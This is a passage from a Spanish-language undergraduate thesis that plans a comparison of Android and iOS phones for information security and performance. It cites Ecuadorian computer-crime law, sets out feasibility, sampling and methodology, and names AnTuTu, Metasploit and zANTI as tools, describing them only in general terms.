Articulo 230.- Interceptación ilegal de datos.- Será sancionada con pena

privativa de libertad de tres a cinco años:

1. La persona que diseñe, desarrolle, venda, ejecute, programe o envíe

mensajes, certificados de seguridad o páginas electrónicas, enlaces o

ventanas emergentes o modifique el sistema de resolución de nombres de

dominios de un servicio financiero o pago electrónico u otro sitio personal o

de confianza, de tal manera que induzca a una persona a ingresar a una

dirección o sitio de internet diferente a la que quiere acceder. (Asamblea

Nacional Registro Oficial, 2014, p. 36)

2. La persona que a través de cualquier medio copie, clone o comercialice

información contenida en las bandas magnéticas, chips u otro dispositivo

electrónico que esté soportado en las tarjetas de crédito, débito, pago o

similares. (Asamblea Nacional Registro Oficial, 2014, p. 36)

33

Articulo 231.- Transferencia electrónica de activo patrimonial.- La persona

que, con ánimo de lucro, altere, manipule o modifique el funcionamiento de

programa o sistema informático o telemático o mensaje de datos, para

procurarse la transferencia o apropiación no consentida de un activo

patrimonial de otra persona en perjuicio de esta o de un tercero, será

sancionada con pena privativa de libertad de tres a cinco años. Con igual pena

será sancionada la persona que facilite o proporcione datos de su cuenta

bancaria con la intención de obtener, recibir o captar de forma ilegítima un

activo patrimonial a través de una transferencia electrónica producto de este

delito para sí mismo o para otra persona. (Asamblea Nacional Registro Oficial,

2014, p. 37)

Artículo 232.- Ataque a la integridad de sistemas informáticos.- La persona

que destruya, dañe, borre, deteriore, altere, suspenda, trabe, cause mal

funcionamiento, comportamiento no deseado o suprima datos informáticos,

mensajes de correos electrónicos, de sistemas de tratamiento de información,

telemático o de telecomunicaciones a todo o partes de sus componentes

lógicos que lo rigen, será sancionada con pena privativa de libertad de tres a

cinco años. (Asamblea Nacional Registro Oficial, 2014, p. 37)

Con igual pena será sancionada la persona que:

1. Diseñe, desarrolle, programe, adquiera, envié, introduzca, ejecute, venda o

distribuya de cualquier manera, dispositivos o programas informáticos

maliciosos o programas destinados a causar los efectos señalados en el

primer inciso de este artículo. (Asamblea Nacional Registro Oficial, 2014, p.

37)

34

Articulo 234.- Acceso no consentido a un sistema informático, telemático

o de telecomunicaciones.- La persona que sin autorización acceda en todo o

parte a un sistema informático o sistema telemático o de telecomunicaciones o

se mantenga dentro del mismo en contra de la voluntad de quien tenga el

legítimo derecho, para explotar ilegítimamente el acceso logrado, modificar un

portal web, desviar o redireccionar de tráfico de datos o voz u ofrecer servicios

que estos sistemas proveen a terceros, sin pagarlos a los proveedores de

servicios legítimos, será sancionado con la pena privada de la libertad de tres

a cinco años. (Asamblea Nacional Registro Oficial, 2014, p. 37)

Capítulo segundo “Delitos contra los Derechos de libertad”

Sección sexta “Delitos contra el derecho a la intimidad

personal y familiar”

Artículo 178.- Violación a la intimidad.- La persona que, sin contar con el

consentimiento o la autorización legal, acceda, intercepte, examine, retenga,

grave, reproduzca, difunda o publique datos personales, mensajes de datos,

voz, audio y video, objetos postales, información contenida en soportes

informáticos, comunicaciones privadas o reservadas de otra persona por

cualquier medio, será sancionada con pena privada de libertad de uno a tres

años. No son aplicables estas normas para las personas que divulguen

grabaciones de audio y video en las que intervienen personalmente, ni cuando

se trata de información pública de acuerdo con lo previsto en la ley. (Asamblea

Nacional Registro Oficial, 2014, p. 30)

35

PREGUNTAS CIENTÍFICAS A CONTESTAR

¿Se puede determinar las ventajas y desventajas de las dos plataformas: Android

e iOS en los términos de seguridad de la información y rendimiento; mediante

herramientas de seguridad informática y aplicaciones benchmark?

¿Mediante el análisis comparativo en los términos de seguridad de la información

y rendimiento, se puede establecer una guía de recomendaciones a los usuarios?

VARIABLES DE LA INVESTIGACIÓN.

Variables dependientes

Recomendaciones que permita seleccionar entre las plataformas Android e iOS

Variables independientes

Seguridad de la información entre sistemas operativos Android e iOS en teléfonos

móviles.

Rendimiento entre sistemas operativos Android e iOS en teléfonos móviles.

DEFINICIONES CONCEPTUALES

Seguridad de la información

Es un activo estratégico para las organizaciones. (Cárdenas, 2012, p. 26)

Se define como la implementación de medidas, técnicas, herramientas,

estándares, leyes, entre otras, destinadas a preservar la confidencialidad, la

integridad y la disponibilidad de los sistemas y redes de cómputo y en

consecuencia la información que contienen. (Mahecha & Tavera, 2016, p. 27)

36

Seguridad informática

Es la disciplina que se ocupa de diseñar las normas, procedimientos, métodos y

técnicas destinados a conseguir un sistema de información seguro y confiable.

(Aguirre, 2006, p. 9)

Seguridad

Capacidad para alcanzar niveles aceptables de riesgo, Disponibilidad de

mecanismo que controlan y protegen la aplicación y los datos almacenados.

(Casas & Enríquez, 2014, p. 29)

Rendimiento

Es el número de procesos que se ejecutan por unidad de tiempo. (Morales, 2012)

Es decir la cantidad de procesos que se ejecutan en un tiempo determinado.

Datos

Constituye el núcleo de toda organización, hasta el punto que se tiende a

considerar que el resto de los activos están al servicio de la protección de los

datos, (Aguirre, 2006)

Información

Es un conjunto de datos tratados con el fin de reducir la incertidumbre, para

aumentar el conocimiento de algo específico. (Thompson, 2008)

37

Vulnerabilidad

Es un defecto de una aplicación que puede ser aprovechada por un atacante. Si

lo descubre, el atacante programara un software (malware) que utiliza esta

vulnerabilidad para tomar el control de la maquina (exploit) o realizar cualquier

operación no autorizada. (Roa, 2013, p. 17)

Amenazas

Es la posibilidad de ocurrencia de cualquier tipo de evento o acción que puede

producir un daño (material o inmaterial) sobre los elementos de un sistema, y en

caso de los Smathphones, sobre los elementos relacionados con la información y

el propio dispositivo hardware. (García, 2017, p. 5)

Riesgos

Estimación del grado de exposición a que una amenaza se materialice sobre uno

o más activos causando daños o perjuicios a la organización. (Salellas, 2017)

Hardware

Se trata de los equipos (servidores y terminales) que contienen las aplicaciones y

permiten su funcionamiento, a la vez que almacenan los datos del sistema de

información. (Aguirre, 2006, p. 12)

Software

Constituidos por los sistemas operativos y el conjunto de aplicaciones instaladas

en los equipos de un sistema de información que reciben y gestionan o

transforman los datos para darles el fin que se tenga establecido. (Aguirre, 2006,

p. 12)

38

Malware

Es un programa creado con un propósito malicioso para los dispositivos móviles,

donde accede sin permisos del usuario. El propósito puede ser muy diferente, pero

los más comunes actúan capturando datos personales y beneficio económico.

(Villa, 2016)

Virus

Es un software malicioso con el propósito de contaminar cualquier archivo,

modificándolos e incluso dejándolos sin funcionamiento, obsoletos. (Villa, 2016)

Gama alta de teléfonos

Son aquellos smathphones que estén dotados con casi todos los elementos más

evolucionados de la telefonía móvil, como las características, componentes,

avances, tendencias e innovaciones que proporciona la tecnología móvil. (Conde,

2017)

Gama baja de teléfonos

Son aquellos celulares inteligentes con sistemas operativos que no dan soporte a

muchas utilidades que poseen estos teléfonos de diferentes gamas. Son

diferentes a los teléfonos básicos ya que no sólo realiza y recibe llamadas, sus

funciones van más allá de estos teléfonos. (Conde, 2017)

Stand-alone

Es un software que puede ser utilizado en cualquier ordenador, sin necesidad de

ser instalado y no necesita conexión a la red para funcionar. (Alegsa, 2013)

39

Ciberdelincuentes

Personas que se dedican a actividades delictivas por medio de internet como robar

información, acceder a redes privadas, estafas y todo referente a delitos e

ilegalidad; es decir atacan a cualquier sistema informático.(Seguridadpc.net, 2017)

40

CAPÍTULO III

Análisis de factibilidad

Se realiza un análisis de factibilidad para afirmar que el proyecto es posible

realizar, mediante la evaluación de los siguientes criterios de factibilidad; a

continuación, se define cada uno de los que se han considerado para este

proyecto:

Factibilidad operativa

En la actualidad existen antecedentes de estudio con respecto a la seguridad de

la información y rendimiento debido al avance tecnológico en dispositivos móviles

y el uso masivo por las empresas y personas. La importancia que le dan los

usuarios en proteger la información es evidente por los ataques que existen a

menudo y el riesgo que corren frente a los ciberdelincuentes. Las empresas serán

los más interesados debido al uso masivo de la tecnología móvil y por lo tanto

están preocupados en proteger la información de la organización y aprovechar al

máximo los teléfonos móviles.

Para realizar el estudio de los sistemas operativos Android e iOS se cuenta con

las herramientas necesarias para el análisis comparativo de la seguridad de la

información y rendimiento, los resultados obtenidos servirán de ayuda para

empresas y personas ya que la tecnología móvil y las dos plataformas gobiernan

en los usuarios. Se planteará recomendaciones en una guía amigable que dé a

conocer los beneficios de los sistemas operativos a los usuarios interesados.

Además, para el estudio a analizar se cuenta con el personal necesario; en este

caso es la autora que realiza el trabajo de titulación.

41

Factibilidad técnica

Para el análisis comparativo se posee seis teléfonos móviles Android e iOS,

características similares y además una laptop.

Para el estudio se cuenta con tres teléfonos inteligentes de marca Samsung y tres

iPhone, por ser los más vendidos en la actualidad. Por lo tanto, son los que

mayormente están expuestos a cualquier ataque de seguridad de la información y

de tener cuidado con el rendimiento con respecto a los sistemas operativos

móviles.

A continuación, se describen las características de los equipos a utilizar tanto de

hardware como de software.

Características de los equipos para el análisis

.

Elaboración: Ruth Asqui

Fuente: Ruth Asqui

CARACTERISTICAS

Hardware

ARQUITECTURA: ARM Cortex-A53

MODEL CPU: Quad-Core ARMv7

PROC (VFPv4, NEON) 200.0-1190.4MHz

MEMORIA RAM: 1383MB

Software

Android 6.0.1 (32 bit)

Antutu 3DBench

Antutu Benchmark v6.2.7

CUADRO N° 3

CARACTERÍSTICAS - SAMSUNG GALAXY J5

42

Elaboración: Ruth Asqui

Fuente: Ruth Asqui

Elaboración: Ruth Asqui

Fuente: Ruth Asqui

CARACTERISTICAS

Hardware

iOS Versión 10.3.3

Antutu 3DBench

Antutu Benchmark V6.3

Software

ARQUITECTURA: OS X

MODEL CPU: A6 Dual-Core

PROC (A6) 1.3 GHz

MEMORIA RAM: 1 GB

CARACTERISTICAS

Hardware

ARQUITECTURA: ARM Cortex-A53

MODEL CPU: 8 Core ARMv7

PROC (VFPv4,NEON) 1500MMHz

MEMORIA RAM: 1373MB

Software

Android Versión 5.1.1 (32-bit)

Antutu 3DBench

Antutu Benchmark V6.2.7

CUADRO N° 4

CARACTERÍSTICAS – IPHONE 5

CUADRO N° 5

CARACTERÍSTICAS - SAMSUNG GALAXY J7

43

Elaboración: Ruth Asqui

Fuente: Ruth Asqui

Elaboración: Ruth Asqui

Fuente: Ruth Asqui

Software

iOS Versión 11.0.2

Antutu 3DBench

Antutu Benchmark V6.3

CARACTERISTICAS

Hardware

ARQUITECTURA: OS X

MODEL CPU: A9 APL0898 Dual-Core

PROCESADOR: (A9) 1.8 GHz

MEMORIA RAM: 2 GB

CARACTERISTICAS

Hardware

ARQUITECTURA: ARM Cortex-A53

MODEL CPU: 8 Sansung Exynos 8895

PROCESADOR: ( 455.0-2314.0 MHz)

MEMORIA RAM: 3459MBGB

Software

Android Versión 7.0 (64bit)

Antutu 3DBench

Antutu Benchmark V6.2.7

CUADRO N° 6

CARACTERÍSTICAS - IPHONE 6S

CUADRO N° 7

CARACTERÍSTICAS – SAMSUNG GALAXY S8

44

Elaboración: Ruth Asqui

Fuente: Ruth Asqui

Elaboración: Ruth Asqui

Fuente: Ruth Asqui

Existen las tecnologías ya que se cuenta con el hardware y software necesario. El

software tiene la documentación y guías necesarias respectivamente que están

actualizadas. Para la obtención del hardware referente a los teléfonos móviles, se

ha gestionado; para adquirir y realizar el estudio. Además, está disponible el

personal con el conocimiento técnico que requiere la realización del proyecto.

CARACTERISTICAS

HardwarePROCESADOR: CORE I7

MEMORIA RAM: 8 GB

Software

Windows 10

Kali linux

Metasploit

CARACTERISTICAS

Hardware

ARQUITECTURA: OS X

MODEL CPU: A10 Quad-Core

PROC (A10 Fusion) 2.3 GHz

MEMORIA RAM: 2 GB

Software

iOS Versión 11.1.2

Antutu 3DBench

Antutu Benchmark V6.3

CUADRO N° 8

CARACTERÍSTICAS - IPHONE 7

CUADRO N° 9

CARACTERÍSTICAS - LAPTOP

45

Factibilidad legal

El Código Orgánico Integral Penal de la república del Ecuador, respalda la

seguridad de los datos en los sistemas operativos de las organizaciones y

personas, lo cual es posible realizar el análisis comparativo de Android e iOS sin

afectar a los usuarios que tengan un teléfono móvil.

Los usuarios podrán seguir con todas las funciones del teléfono móvil. Y se podrá

medir con la seguridad de la información y rendimiento en las dos plataformas.

Factibilidad económica

Para el análisis de factibilidad económica, se toma en cuenta todos los gastos y

recursos que se necesita para el desarrollo del proyecto. Los gastos y recursos

que se detallarán a continuación en el Cuadro N° 10, serán calculados para una

persona en la duración de uno a dos meses del desarrollo del trabajo de titulación.

Nombre Costo Total

Elaboracion de la

propuesta $ 700.00 $ 700.00

Transporte (Viajes) $ 110.00 $ 110.00

Alimentacion $ 200.00 $ 200.00

Total $ 1,010.00

RECURSOS HUMANOS

Nombre Costo Total

Aplicaciones de seguridad

y rendimeinto $ 0.00 $ 0.00

Herramientas de

seguridad y rendimiento $ 0.00 $ 0.00

Total $ 0.00

SOFTWARE

CUADRO N° 10

COSTO TOTAL DEL PROYECTO

46

Nombre Costo Total

Laptop $ 700.00 $ 700.00

3 Teléfonos Android $ 950.00 $ 950.00

3 Telefonos iOS $ 1,400.00 $ 1,400.00

Total $ 3,050.00

HARDWARE

Elaboración: Ruth Asqui

Fuente: Ruth Asqui

El valor total de gastos que se observan en el cuadro anterior para la elaboración

del proyecto, tales como recursos humanos, software, gastos de oficina y servicio

básico; estos rubros son cubiertos por la autora que realiza el trabajo de titulación.

El costo total para el proyecto es un poco elevado para una persona, pero el

hardware con respecto a los teléfonos inteligentes que son de mayor costo se

posee de antemano, porque se ha realizado la gestión a personas cercanas de la

autora del trabajo de titulación, lo cual ha facilitado para la realización del análisis

comparativo del estudio.

Nombre Costo Total

Impresiones $ 80.00 $ 80.00

Gastos varios $ 20.00 $ 20.00

Total $ 100.00

GASTOS DE OFICINA

Nombre Costo Total

Internet $ 35.00 $ 35.00

Total $ 35.00

Total del proyecto $ 4,195.00

SERVICOS BÁSICOS

47

Es factible realizar el estudio del proyecto, porque a través de éste se darán a

conocer resultados de la propuesta planteada mediante el análisis establecido, lo

cual ayudará a todos los usuarios que posean y vayan a adquirir un teléfono móvil

inteligente en la actualidad y a corto plazo debido al avance tecnológico. Al realizar

el análisis comparativo de seguridad de la información y rendimiento entre Android

e iOS en los teléfonos móviles, se logrará conocer las ventajas y desventajas de

las dos plataformas, lo cual se establecerá en una guía de recomendaciones que

servirá de ayuda a los usuarios interesados del tema.

48

METODOLOGÍA DE LA INVESTIGACIÓN

DISEÑO DE LA INVESTIGACIÓN

Modalidad de la Investigación

Actualmente, debido a que no existen guías de recomendaciones de seguridad de

la información y rendimiento de los teléfonos inteligentes con respecto a los

sistemas operativos Android e iOS, ya que son las plataformas que lideran el

mercado en la actualidad. A pesar de que hay muchas herramientas que realizan

estos análisis, no existen muchos estudios referentes a este tema.

Por tal motivo, la investigación de este trabajo de titulación se enfoca en análisis

cualitativo-cuantitativo, partiendo de las versiones más utilizadas de Android e iOS

de acuerdo a resultados estadísticos adquiridos por consultoras mundiales. Este

análisis permite recoger información de los criterios a evaluar en cada término a

estudiar en los teléfonos móviles inteligentes, lo que se va a describir en una ficha

de resultados.

Con este análisis se pretende obtener los resultados y evaluar los dos términos

para establecer la guía de recomendaciones frente a los dos sistemas operativos

que lideran el mercado de los teléfonos móviles. Esperando a que los usuarios no

tomen los resultados como solución en cuanto a la seguridad de la información y

rendimiento, sino como recomendaciones que pueden ayudar al momento de

adquirir un teléfono móvil.

Enfoques que se realizan de la siguiente manera:

Cuantitativa.- Se utiliza este análisis para dar a conocer el sistema operativo con

mayor rendimiento de acuerdo a los criterios evaluados; ya que para realizar la

comparación de los dos sistemas operativos es necesario tomar en cuenta la

mínima diferencia con respecto a la puntuación de desempeño que se obtenga en

cada test realizado con las herramientas a utilizar.

Cualitativa.- Se opta por esta metodología ya que permitirá analizar la seguridad

de la información y rendimiento, comparando cada criterio elegido en los dos

términos a estudiar en Android e iOS, mediante herramientas de software; de

acuerdo a estos resultados es necesario la observación, lo cual se registrará en

49

una ficha para cada plataforma para así posteriormente determinar las diferencias

que ocurran a nivel de sistemas operativos móviles.

Tipo de investigación

Para el análisis comparativo de “seguridad de la información y rendimiento entre

Android e iOS en teléfonos móviles” se utilizarán los siguientes tipos de

investigación a continuación se describen cada una de ellas:

Investigación comparativa

Se emplea esta investigación, porque se estudiarán dos sistemas operativos

diferentes en teléfonos móviles tanto en Android e iOS, en los cuales se comparará

la seguridad de la información y rendimiento en cada plataforma; con el fin de dar

a conocer las diferencias de éstos con respecto a los términos a estudiar.

Investigación observacional

Se emplea esta investigación porque los resultados generados de las

herramientas que analizarán los términos de seguridad de la información y

rendimiento en los sistemas operativos; no serán manipulados de ninguna

manera, ya que se empleará un proceso donde los resultados serán validados

dando a conocer de manera gráfica los análisis de cada software.

Población y muestra

Población

Para el estudio comparativo se toma como población, la cantidad de versiones de

los dos sistemas operativos tanto Android como iOS del mercado de teléfono móvil

a nivel mundial del año 2017, ya que son las plataformas a analizar. Por lo cual,

se cuenta con 41 versiones de teléfonos, 26 de iOS y 15 de Android. (StatCounter,

2017)

50

Se toma en cuenta como población a las versiones, ya que la cantidad de usuarios

de las plataformas es muy grande y además porque la tecnología tiene un avance

gigante temporalmente. La industria mundial supera los 5000 millones de usuarios

de teléfonos móviles a mediados del año 2017 (GSMA, 2017). Teniendo este dato

a continuación se representa el porcentaje de los sistemas operativos de teléfonos

móviles más utilizados en el año 2017 a nivel mundial.

Fuente: (StatCounter, 2017)

Elaboración: Ruth Asqui

Fuente: (StatCounter, 2017)

En el Gráfico N° 4, se puede evidenciar el porcentaje de usuarios a nivel mundial

que poseen dispositivos móviles en el año 2017. Se puede denotar que los

sistemas operativos Android e IOS son los mayormente utilizados, según los

resultados de (StatCounter, 2017).

GRÁFICO N° 4

SISTEMAS OPERATIVOS DE TELÉFONOS MÓVILES

51

Muestra

La muestra para el análisis comparativo son seis teléfonos inteligentes; tres tienen

sistema operativo Android y los demás sistemas operativos iOS. Para el estudio

se ha elegido trabajar con las versiones más utilizadas y marcas que lideran el

mercado de la tecnología las cuales son Samsung e iPhone. Estos datos se

detallan a continuación de acuerdo a datos obtenidos de StatCounter.

Elaboración: Ruth Asqui

Fuente: (StatCounter, 2017)

En el Gráfico N° 5, se observa las versiones más utilizadas en los dispositivos

móviles de iOS. Las versiones iOS 10.3, iOS 11.0 e iOS 11.1 destacan entre éstas

y son las que se han considerado para el análisis a realizar, ya que son las más

usadas en el año 2017 por los usuarios.

GRÁFICO N° 5

VERSIONES DE SISTEMA OPERATIVO iOS

52

Elaboración: Ruth Asqui

Fuente: (StatCounter, 2017)

En el Grafico N° 6, se observa las versiones que son más utilizadas del sistema

operativo Android en el año 2017 de las cuales son Android 6.0, Android 5.1 y

Android 7.0 se consideraron como muestra para el estudio comparativo a analizar.

A continuación, se presenta los proveedores más grandes de dispositivos móviles

a nivel mundial, que más distribuyeron sus artículos en el año 2017, para hacer

referencia a los teléfonos Samsung e iPhone y seleccionar la muestra de estudio

del análisis comparativo.

GRÁFICO N° 6

VERSIONES DE SISTEMA OPERATIVO ANDROID

53

GRÁFICO N° 7

PROVEEDORES DE DISPOSITIVOS MÓVILES

Elaboración: Ruth Asqui

Fuente: (StatCounter, 2017)

En el Gráfico N° 7 se observa a Samsung como el proveedor que lidera a nivel

mundial con un porcentaje de 32.99%, seguido de Apple con 19.65% y otros en

dispositivos móviles en el año 2017, según resultados de StatCounter.

Mediante los datos obtenidos se procedió a elegir los teléfonos móviles de

Samsung e iPhone para el estudio comparativo en los términos a estudiar.

OPERACIONALIZACIÓN DE VARIABLES

La investigación se enfoca en la comparación de los sistemas operativos de

teléfonos móviles que lideran en la actualidad tales como Android e iOS, como se

detalla en la (sección de Población y muestra) para estudiar la tecnología

actualizada con respecto a los términos de seguridad de la información y

rendimiento. Para el estudio se seleccionaron criterios mediante investigaciones

actuales, las cuales serán analizadas mediante técnicas y herramientas

necesarias para obtener resultados precisos en los dos términos comparados.

54

En el desarrollo investigativo es necesario analizar las variables que influyen para

el proceso de investigación, las cuales se menciona a continuación.

Las variables independientes son “Seguridad de la información entre sistemas

operativos Android e iOS en teléfonos móviles” y “Rendimiento entre sistemas

operativos Android e iOS en teléfonos móviles” las cuales hacen referencia al

análisis de estudio en la investigación a realizar y dan lugar a la variable

dependiente “Recomendaciones que permita seleccionar entre las plataformas

Android e iOS.

En el siguiente cuadro se describe las variables dependientes e independientes,

las dimensiones, indicadores e instrumentos que se utilizaron para la

investigación.

55

Elaboración: Ruth Asqui

Fuente: Ruth Asqui

CUADRO N° 11

OPERACIONALIZACIÓN DE VARIABLES

V.I

Seguridad de la

información entre

sistemas

operativos Android

e iOS en teléfonos

móviles.

Pilares

fundamentales de

seguridad de la

informacion:

*Disponibilidad

* Integridad

*Confidencialidad.

*Número de

Ataques exitosos

*Número de

Ataques fallidos

*Servicios

denegados

*Información

alterada

*Información

accedida

Técnicas:

Observación.

Instrumentos:

Herramientas para

el análisis de

seguridad de la

información y ficha

de observación

obtenidos en cada

ataque realizado

V.I

Rendimiento entre

sistemas

operativos Android

e iOS en teléfonos

móviles.

*Eficiencia,

eficacia del CPU

*Tiempo de

análisis de cada

test

*Desempeño del

SO

*Medicion de

CPU, RAM, 3D,

UX

*Tiempo que

tarda el test

* Cantidad de

rendimiento de

CPU, RAM, 3D,

UX

Técnicas:

Observación.

Instrumentos:

Herramienta para

el análisis de

rendimiento y ficha

de observación

obtenidos en el test

de rendimiento

realizado.

V.D

Recomendaciones

que permita

seleccionar entre

las plataformas

Android e iOS

Recomendacione

s en base al

análisis

comparativo en

los sistemas

operativos.

* Número de

recomendaciones

propuestas para

la seguridad de la

información y

rendimiento.

Técnicas:

Observación

Instrumentos:

Reporte de

recomendaciones.

56

INSTRUMENTOS DE RECOLECCIÓN DE DATOS

Las técnicas de recolección de datos ayudan a determinar cómo actúa cada

sistema operativo en cada término a estudiar. La técnica de recolección de datos

es la observación mediante el instrumento fichas de observación y test.

La ficha de observación es el instrumento donde se registran todos los resultados

que nos brinda cada herramienta que realiza el estudio de seguridad de la

información y rendimiento en los teléfonos móviles para posteriormente analizar

los resultados y dar conclusiones del estudio.

PROCEDIMIENTOS DE LA INVESTIGACIÓN

El procesamiento de la investigación surge desde el momento en que grupos de

usuarios que utilizan la tecnología móvil se sienten inconformes con respecto a

términos de seguridad de la información y rendimiento en sus teléfonos móviles.

Por lo cual se ha realizado una investigación en artículos científicos y páginas web

que realizan estudios de los sistemas operativos que lideran el mercado de la

tecnología móvil con respecto a la gran cantidad existente en el mundo. Para elegir

una población y poder realizar el análisis comparativo se procedió a investigar las

versiones que están liderando las dos plataformas, para poder establecer la

muestra de la población. (Ver sección de Población y Muestra).

Una vez determinada la muestra, se establece un procedimiento para comparar la

seguridad de la información y rendimiento en los sistemas operativos Android e

iOS mediante herramientas de software.

Es por eso que se realizó una ficha de observación para apreciar la información

que nos brinda cada herramienta utilizada y posteriormente obtener un análisis de

la seguridad de la información y rendimiento.

57

A continuación, se presenta el proceso que se realiza en esta investigación:

El problema:

Planteamiento del problema

Objetivos de la investigación

Justificación e importancia de la investigación

Marco Teórico:

Fundamentación teórica

Fundamentación legal

Preguntas científicas a contestar

Definiciones conceptuales

Metodología:

Diseño de la investigación (Tipo de investigación)

Población y Muestra

Instrumentos de recolección de datos

Operacionalización de variables, dimensiones e indicadores

Procedimientos de la investigación

Recolección de información

Procesamiento y análisis

58

RECOLECCIÓN DE INFORMACIÓN

La técnica fundamental en el desarrollo del proyecto para la recolección de

información se obtiene mediante los resultados de cada software que analiza la

seguridad de la información y rendimiento en los sistemas operativos en los

teléfonos móviles.

La principal técnica usada es la observación de los datos que se recolecta en cada

análisis, en los cuales se registra en las fichas de observación cada criterio que

se evalúa en los diferentes sistemas operativos.

El procedimiento para la recolección de datos de la ficha de observación se lleva

a cabo en el trascurso del desarrollo del capítulo 3, en Procesamiento y Análisis

de este trabajo de titulación con el objetivo de obtener resultados que nos

recalquen las diferencias de los dos sistemas operativos en los diferentes

teléfonos de cada término analizado.

El instrumento, test o prueba consiste en realizar cantidades de pruebas, tanto

para la seguridad de la información y el rendimiento en los diferentes teléfonos

móviles seleccionados para obtener resultados claros y precisos para cada

término analizado.

PROCESAMIENTO Y ANÁLISIS

Procesamiento y análisis comparativo en los sistemas

operativos móviles

Para el desarrollo del proyecto para el análisis comparativo en seguridad de la

información y rendimiento de los sistemas operativos se seguirán los siguientes

pasos:

59

1. Seleccionar criterios a evaluar, para cada término a

comparar

Se eligen criterios que influyen tanto en seguridad de la información y rendimiento

en los sistemas operativos a analizar, para poder decidir entre Android e iOS

respecto cada término a estudiar.

Los criterios fueron seleccionados mediante la investigación de artículos

científicos y estudios en donde de alguna manera se han enfocado respecto a la

seguridad de la información y rendimiento en los sistemas operativos; es por tal

motivo que se ha podido establecer los criterios para los dos términos a estudiar.

Con respecto a la seguridad de la información en la (sección de antecedentes) y

demás investigaciones realizadas se presenta estudios donde la información ha

sido vulnerada en los criterios que se han seleccionado. (Cárdenas, 2012)

A continuación, se presenta la tabla con los criterios que se evaluarán para cumplir

con los objetivos de este trabajo de titulación y dar una guía de recomendaciones

a los usuarios.

Elaboración: Ruth Asqui

Fuente: (Morales, 2012) (Cárdenas, 2012)

TÉRMINOS

SEGURIDAD DE LA

INFORMACION EN

SISTEMAS

OPERATIVOS.

Integridad de la información

Confidencialidad de la

informacion

Disponibilidad de la información

CRITERIOS

RENDIMIENTO EN

SISTEMAS

OPERATIVOS

Eficacia, eficacia,

utilización de la CPU

Tiempo de Ejecución

Desempeño

CUADRO N° 12

TÉRMINOS Y CRITERIOS DE ANÁLISIS

60

2. Seleccionar herramientas para el análisis comparativo

de seguridad de la información y rendimiento.

Mediante las herramientas se evaluarán los criterios que se han elegido tanto en

seguridad de la información y rendimiento.

Se investigaron softwares que analicen cada uno de los criterios que se ha elegido

para el análisis en cada sistema operativo; existen cantidades de herramientas

que realizar estos estudios, pero se ha elegido las más utilizados y compatibles

para los dos sistemas operativos para que los resultados dependan sólo de la

plataforma. Por lo cual se eligió Antutu Bechmark aplicación compatible para

Android e iOS para medir el rendimiento y para verificar la seguridad de la

información se eligió Metasploit y Zarti.

A continuación, se presenta la tabla de las herramientas que se seleccionó para

realizar el análisis comparativo con respecto a la seguridad de la información y

rendimiento:

61

Elaboración: Ruth Asqui

Fuente: (Morales, 2012) (Cárdenas, 2012)

CUADRO N° 13

TÉRMINOS Y CRITERIOS DE SEGURIDAD DE LA INFORMACIÓN Y RENDIMIENTO `

TÉRMINOS HERRAMIENTAS

Poderosa plataforma de

Pentesting para descubrir,

escanear y atacar redes en

forma automatizada. Realiza

mapeo de red, Sniffer, DOS,

Auditar la complejidad de las

contraseñas, etc.SEG

UR

IDA

D D

E LA

INFO

RM

AC

ION

EN

SIS

TEM

AS

OP

ERA

TIV

OS.

Disponibilidad de

la información

Integridad de la

informacion

ZANTI

(Android)

Confidencialidad

de la información

CRITERIOS JUSTIFICACIÓN

ARMITAGE -

METASPLOIT

(Kali Linux)

Tiene cientos de maneras de

atacar a cualquier sistema

operativo que se ponga en

frente. Proporciona

información acerca de

vulnerabilidades de

seguridad y ayuda en tests de

penetración.

REN

DIM

IEN

TO E

N S

ISTE

MA

S O

PER

ATI

VO

S

Eficacia, eficacia,

utilización de la

CPU

Mide el rendimiento de la

RAM, CPU, 3D y UX; testea el

terminal, fue utulizada por

Google I/O de 2014 desde

entonces se considera un

estándar industrial.

Nos da el resultado mediante

una ficha del rendimiento

total y también específica

cada criterio de evaluación

mediante puntuación.

DesempeñoANTUTU BENCHMARK

(Android e iOS,)

Cronómetro

ANTUTU BENCHMARK

(Android e iOS,)

Tiempo de

EjecuciónTiempo que Antutu tarda en

realizar el test

Es el resultado que nos

presenta Antutu después del

análisis.

62

A continuación, se describe cada herramienta a utilizar:

Benchmark

Los benchmark, son pruebas que nos permiten medir el rendimiento en los

teléfonos inteligentes. Un benchmark, es una manera de conocer si un procesador

es mejor que otro, esto se obtiene observando la ficha técnica como resultado.

(Iván, 2016)

Generalmente el análisis consiste a mayor número de núcleo y mayor frecuencia

se obtiene el mejor rendimiento en los teléfonos. Pero también influye la

arquitectura, quien termina siendo el determinante del rendimiento en el mundo

real. (Iván, 2016)

Con un benchmark, no debemos preocuparnos de la arquitectura, gigahercios y

que núcleos tengamos en los teléfonos. A mayor puntuación mejor procesador, la

medida se podrá entender sin acudir a ninguna cuantificación técnica, según el

tiempo que tarde se obtendrá la puntuación en el análisis. (Iván, 2016)

A continuación, se describe de manera breve de la aplicación Antutu Benchmark.

Antutu Benchmark

Denominada como la prueba más veloz y completa, es la aplicación para medir el

rendimiento.

Es compatible con los dispositivos Android desde la versión 2.3 o superior, al

finalizar el análisis, presenta las puntuaciones en base a las prestaciones del

Smartphone, lo cual permite realizar comparación con otros dispositivos.

(Barranger, 2014). Mientras en iOS Antutu es compatible desde iOS versión 8.0.

Para medir el rendimiento se toma dos teléfonos con características de hardware

similares y con sistemas operativos diferentes, Android (Samsung) e iOS (iPhone).

63

Antutu mide los criterios 3D (capacidad de rendimiento graficas 3D), UX

(experiencia del usuario), CPU Y RAM en cada teléfono móvil.

Para comparar la seguridad de la información tanto para Android como en iOS, se

realizará mediante las herramientas Metasploit y Zanti.

A continuación, se realiza una descripción breve de cada software:

Metasploit

Es un proyecto de seguridad informática que se encuentra en el sistema operativo

Kali Linux; permite acceder a cualquier plataforma, realizar ejecución de

vulnerabilidades y pruebas de penetración. Es un conjunto de herramientas más

utilizadas por los hacker y profesionales para realizar ataques informáticos de

manera sistematizada y automatizada. (Duarte, 2012)

Metasploit, ayudará a encontrar y ejecutar vulnerabilidades en Android e iOS,

mediante líneas de comandos, por lo cual se eligió para realizar el estudio en los

sistemas operativos referente a la seguridad de la información.

Zanti

Zanti es una herramienta compatible para Android, no se encuentra en su tienda;

realiza pruebas de penetración de redes wifi, escaneo avanzado de redes, busca

vulnerabilidades de seguridad, atacar puertos y redirecciona tráfico y ejecutar

exploit. (Solvetic Seguridad, 2017). Esta herramienta se eligió para espiar,

denegar servicios y alterar información tanto en iOS y Android por medio de la red

wifi.

64

3. Proceso de evaluación

